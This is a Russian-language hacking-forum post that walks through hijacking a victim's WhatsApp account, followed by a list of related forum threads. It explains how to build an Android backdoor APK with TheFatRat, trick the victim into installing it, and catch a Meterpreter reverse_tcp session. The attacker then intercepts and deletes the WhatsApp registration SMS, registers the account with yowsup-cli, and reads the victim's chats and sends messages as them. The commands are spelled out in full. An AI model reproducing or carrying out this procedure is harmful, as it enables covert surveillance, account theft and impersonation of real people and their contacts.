RemoteWA Охота на пользователей Whatsapp

wrangler65

Пользователь
Сегодня разберём один из интересных способов атаки на пользователей Whatsapp.

В итоге,мы должны будем получить полный контроль над аккаунтом,просматривать сообщения,разговоры в текстовом формате.
И,на мой взгляд,самое страшное-способность отсылать сообщения от имени скомпрометированного абонента на другие контакты.

Для этого нам понадобиться знать 3 вещи: номер телефона,наличие у абонента Android и то,что он пользуется приложением Whatsapp.
Нам также будут необходимы инструменты Metasploit,TheFatRat,RemoteWA,yowsup.

Итак,погнали.У нас имеются следующие исходные данные:
а) Наш Ip-адрес роутера,он же шлюз (192.168.0.1 или 192.168.1.1)
б) Наш публичный IP-адрес (внешний)
В) MCC — код страны - это берём из википедии https://en.wikipedia.org/wiki/mobile_country_code
г) MNC — код сети (Числовой код,соотв-щий оператору сотовой сети,берём также из Вики по справочнику)
д) СС - телефонный код страны (а не то,что некоторые подумали))
В маршрутизаторе открываем для tcp-соединения порт 2020,которое будет перенаправляться на наши IP как внутренний, так и внешний.
Теперь,надо создать исполняемый файл с расширением .apk,который будет здесь/TheFatRat/output/papados.apk (к примеру)

Запускаем программу TheFatRat и выбираем 1 (создать Backdoor с msfvenom)
Далее,указываем пункт 3 (Android fatrat.apk)

IP-адрес тестируемого Amdroid, нам знать необязательно при этом.
Грузим наш файл на ресурс,позволяющий загрузить файл для свободного доступа.
Например,который приводит автор : http://ge.tt/

Это неважно,т.к. смысл в том,чтобы тестируемый абонент скачал и сохранил этот файл себе (придётся проявить способности СИ)
На данном этапе,у нас появляется доступ к мобильному устройству.

Стартуем Metasploit и закатываем use exploit / multi / handler
И указываем нагрузку : set loadload android / meterpreter / reverse_tcp

Указываем LHOST c LPORT 2020,даём команду exploit.
В этом случае,мы получаем сессию Meterpreter (если тестируемый абонент скачал себе наш вредонос)

Мы сейчас здесь не за этим конечно, и у нас уже установленa yowsup
Это библиотека python, которая позволяет нам создавать приложение, использующее службу WhatsApp.
Yowsup также используется для создания неофициального клиента WhatsApp
По идее,пакет устанавливает RemotеWA,но на всякий случай.
Уствновка:


Код:

# git clone https://github.com/tgalal/yowsup.git
# cd yowsup
# chmod +x setup.py
# sudo pip install yowsup2
# sudo python setup.py install



1752514231223



И установим самое главное:



Код:

# git clone https://github.com/MundoHackers/RemoteWA.git
# cd RemoteWA/
# sudo ./RemoteWA.sh
# Дважды подтверждаем (Y)


Интерфейс на первом скрине
Да,если начнёте пробовать этот инструмент,то поймёте,как автор немного перестарался,в нём есть практически всё для этой атаки.
Автоматизация всего описанного процесса,так сказать,присутствует.

водим команду:


Код:

# yowsup-cli registration --requestcode sms --phone телефон --cc телеф.код страны --mnc код фирмы,предоставляющей услуги


Этим мы добиваемся того,что whatsapp отправляет sms абоненту с кодом для входа для этого приложения.
Помним,что у нас есть открытая сессия в meterpreter, и у есть возможность просмотреть полученные sms и удалить их.

Таким образом,мы также говорим Whatsapp,что используем другое устройство (наш терминал конечно же)
На этом этапе генерируется код регистрации:
meterpreter> dump sms
Создаём файл, из которого мы можем визуализировать содержимое:
SMS messages dump

Теперь,делаем такой запрос,запустив второй терминал,и нам Whatsapp высылает пароль:


Код:

# sudo yowsup-cli registration --register код полученный --phone телефон --cc телеф.код страны


Ищем строку pw и видим пароль.

Создадим файл с именем whatsapp_config.txt
Так становятся доступны переговоры тестируемого абонента с третьими лицами
При этом ,мы можем видеть не только слова,но и номера тех,кто говорит с тестируемым.



Код:

# sudo yowsup-cli demos --config whatsapp_config.txt --echo


А вот таким образом,мы можем от имени тестируемого отправлять сообщения,указав другой номер телефона:




Код:

# yowsup-master/sudo yowsup-cli demos --config whatsapp_config.txt --send номер телефона"сообщение"


Для себя отметил 2 сложности такого метода:
1) Файл должен попасть на Android тестируемого.
2) Тестируемый должен быть после в полном неведении (ведь ему будут приходить сообщения,которые надо будет убрать)

Но ,тем не менее,метод имеет право на существование.
Согласитесь,что если ещё и иметь физический доступ к устройству тестируемого...некрасивенько, однако , для него получается.)
 
Похожие темы
Support81 Охота Секретной службы за Джокером с вознаграждением в 10 миллионов долларов: Тимур Камилевич Шахмаметов Ч.3 Новости в сети 1
Support81 Охота Секретной службы за Джокером с вознаграждением в 10 миллионов долларов: Тимур Камилевич Шахмаметов Ч.2 Новости в сети 0
Support81 Охота Секретной службы за Джокером с вознаграждением в 10 миллионов долларов: Тимур Камилевич Шахмаметов Новости в сети 0
Support81 SSLoad: охота на цифровые отпечатки объявляется открытой Новости в сети 0
Support81 Endgame: охота на главаря ботнета Emotet превратилась в детективный сериал Новости в сети 0
Support81 Охота на мамонтов продолжается: «Неандертальцы» не оставляют шанса пользователям Авито, Юлы и СДЭК Новости в сети 0
Admin Интересно «Верните деньги, или мы идём в полицию». CrossCurve дала похитителям ровно 72 часа на возврат крипты. Новости в сети 0
Admin Интересно Читы, локеры и 110 заблокированных доменов. Группировка NyashTeam прячется за вывеской «Легиона» и продолжает охоту на геймеров. Новости в сети 0
Admin Статья Нетипичная змея. Реверсим приложение на Python c кастомным интерпретатором Вирусология 0
Admin Статья Пишем свой простейший дроппер на плюсах Вирусология 0
Admin Статья Пишем свой лоадер на плюсах - теория Вирусология 0
Admin Интересно Второй раз — это уже традиция. Антивирус eScan снова поймали на «сотрудничестве» с хакерами. Новости в сети 0
Admin Интересно Хакер думал, что украл пароль, а на самом деле – позвонил в полицию. На GitHub учат, как развести взломщика на эмоции (и логи). Новости в сети 0
Admin Интересно Четверть биткоина за «квантовые мозги». Рассказываем, как поднять крипту на знании физики. Новости в сети 0
Admin Интересно DynoWiper против польского света. Рассказываем историю самой мощной хакерской атаки на инфраструктуру страны за последние годы. Новости в сети 0
Admin Интересно Apple и OpenAI создают ИИ-жучки — микрофоны и камеры на теле будут слушать и снимать вас 24/7. Новости в сети 0
Admin Интересно Кликнули на файл «Задание_для_бухгалтера.txt»? Поздравляем — троян-шпион уже ворует ваши пароли. Новости в сети 0
Admin Статья Как на основе ФИО, даты рождения и района получить номер паспорта и ИНН. OSINT 0
Admin Статья Поднимаем личный VPN-сервер за 30 мин на своем VPS через Amnezia VPN Анонимность и приватность 0
Admin Разделение почты на Python по доменам Скрипты 0
Admin Интересно «Отдай мастер-пароль, или всё удалим!». Как хакеры берут на мушку пользователей LastPass. Новости в сети 0
Admin Статья Стеганография на примере Steghide Полезные статьи 0
Admin Интересно Ретро-хакинг на максималках. Почему ваша корпоративная сеть до сих пор думает, что на дворе девяностые. Новости в сети 0
Admin Статья Разработка малвари на С++. Глава II Вирусология 0
Admin Статья Разработка малвари на С++. Глава 1. Вирусология 0
Admin Статья Обход пароля на iphone Уязвимости и взлом 0
Admin Статья DDoS на Bluetooth. Разбираем трюк, который поможет отключить чужую колонку Полезные статьи 0
Admin Статья Взлом wi-fi на легке Полезные статьи 0
Admin Статья Полное Руководство по Google Dorks: Говорим с Поисковиком на Его Языке OSINT 0
Admin Интересно «Ваш пароль истекает» (на самом деле нет). Microsoft объясняет, почему нельзя верить даже письмам от собственного HR. Новости в сети 0
Admin Интересно Эксплойт уже на GitHub. Главная система защиты Cisco снова пробита. Новости в сети 0
Admin Интересно ZIP-архив и скрытый MSBuild. Из чего состоит новая атака на военных, которую пропустили антивирусы. Новости в сети 0
Admin Статья Право на root. Как повышают привилегии в Linux. Уязвимости и взлом 0
Admin Интересно 70000 пострадавших и 20 миллионов на кону – начались первые аресты по делу о предательстве в Coinbase. Новости в сети 0
Admin Статья Браузерные расширения — идеальный шпион: Стиллер паролей на JavaScript, который невозможно заметить Вирусология 0
Admin Интересно Казалось, что летим, а на деле — ползём. Как ИИ-помощники незаметно крадут время у профессиональных кодеров. Новости в сети 0
Admin Интересно Цифровое чудо на Рождество. Как ученым удалось восстановить UNIX V4 с ленты 1970-х годов. Новости в сети 0
Admin Интересно 0 на VirusTotal и root-доступ: хакеры смогли обмануть все антивирусы с помощью легального софта для админов. Новости в сети 0
Admin Статья Полное Руководство по Google Dorks: Говорим с Поисковиком на Его Языке OSINT 0
Admin Интересно Firebox рвут на куски прямо сейчас — критическая дыра топит корпоративные сети без пароля и удалённо. Новости в сети 0
Admin Статья XSS от Яндекс на обед Полезные статьи 0
Admin Интересно Код на GitHub, который хакеры хотели бы удалить – Agentic Threat Hunting Framework уже в сети. Новости в сети 0
Admin Интересно Ваш компьютер вам врёт: в BIOS написано «защищено», а на деле — заходи, кто хочет. Новости в сети 0
Admin Статья Сбор информации в Instagram с Osintgram на Kali Linux. OSINT 0
Emilio_Gaviriya Работа на Пабло Эскобара. Возрождение. Предоставляю работу. Ищу специалиста. 0
el_hacker Статья Удобная анонимность на практике. Анонимность и приватность 0
el_hacker Интересно Компрометированные учетные данные IAM используются для масштабной кампании по майнингу криптовалюты на AWS. Новости в сети 0
turbion0 Мошенничество на 11 миллионов рублей: в Красноярске арестовали звезд сборной России по санному спорту Новости в сети 0
Support81 Вы отключали Cloudflare во время сбоя? Срочно проверьте логи на предмет взлома Новости в сети 0
Support81 Этичный хакинг? Забудьте. США готовят рои ИИ-агентов для атаки на Китай Новости в сети 0

Название темы